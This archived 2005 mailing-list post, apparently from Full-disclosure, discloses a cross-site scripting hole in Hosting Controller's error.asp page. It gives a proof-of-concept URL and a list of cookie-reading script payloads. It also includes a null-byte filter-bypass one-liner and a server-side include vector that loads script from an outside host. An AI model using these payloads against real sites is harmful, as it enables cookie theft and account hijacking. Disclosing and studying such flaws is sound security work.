Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Cross-Site Scripting (CSS) in Hosting Controller All Version and hot fix it hehe ;) |
|---|---|
| Date: | 28 Jun 2005 11:57:53 -0000 |
Cross-Site Scripting (CSS) in Hosting Controller All Version and hot fix it
hehe ;)
ActionSpider@linuxmail.org
[Ashiyane Security Team ]
[SegmentationFault Group] iam sun-os hehe :P
Greetz to : S4P0 - failed - Xsupr3mo - Status-x - Stealh
Greetz to : berhooz - nima - ehsan - Mehrtash and ...
www.ashiyane.com *
*******************************************************************************************
path : /admin/hosting/error.asp?error=
http://www.victim.com/admin/hosting/error.asp?error=Xss vul
example :
JavaScript code : <script>alert(document.cookie)</script>
in victim :
http://www.victim.com/admin/hosting/error.asp?error=%3Cscript%3Ealert(document.cookie)%3C/script%3E
1-about css :
Cross-site scripting attacks place malicious code, usually JavaScript, in
locations where
other users see it. Target fields in forms can be addresses, bulletin board
comments, and
so on. The malicious code usually steals cookies, which would allow the
attacker to impersonate
the victim, or perform a social engineering attack, which may trick the victim
into divulging his or her password. Hotmail and AOL have been plagued by this
type of
social engineering attack.
One test suffices to indicate whether or not an application is vulnerable to a
CSS attack.
This is not intended to be a treatise on JavaScript or uber-techniques for
manipulating
browser vulnerabilities. Here are three methods that, if successful, indicate
that an
application is vulnerable
ok it is too easy for u if u want work with other commend(other commend ???
hehe yeah other commend)
elite Hacker Can use it for Acsess to Server hehe see other example for this
mthoding ;)
<script> SRC="c:\boot.ini"></script>
<script>alert(src=C:\boot.ini)</script>
<script>alert(document.cookie)</script>
<script>alert('document.domain='+document.domain)</script>
<script>document.write(document.cookie)</script>
<script>alert('ActionSpider!')</script>
and Here is a little known XSS attack vector using null characters.
You can actually break up the HTML itself using the same nulls as shown above.
I've seen this vector bypass some of the most restrictive XSS filters to date
(again, only works in IE, Netscape 8.0 in trusted site mode and older versions
Opera):
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
SSI (Server Side Includes) requires SSI to be installed on the server to use
this XSS vector:
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo
'=http://Ashiyane.org/action.js></SCRIPT>'"-->
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [Full-disclosure] [USN-145-1] wget vulnerabilities, Martin Pitt |
|---|---|
| Next by Date: | [Fwd: phpBB 2.0.16 released], Christian Boenning |
| Previous by Thread: | [Full-disclosure] [USN-145-1] wget vulnerabilities, Martin Pitt |
| Next by Thread: | [Fwd: phpBB 2.0.16 released], Christian Boenning |
| Indexes: | [Date] [Thread] [Top] [All Lists] |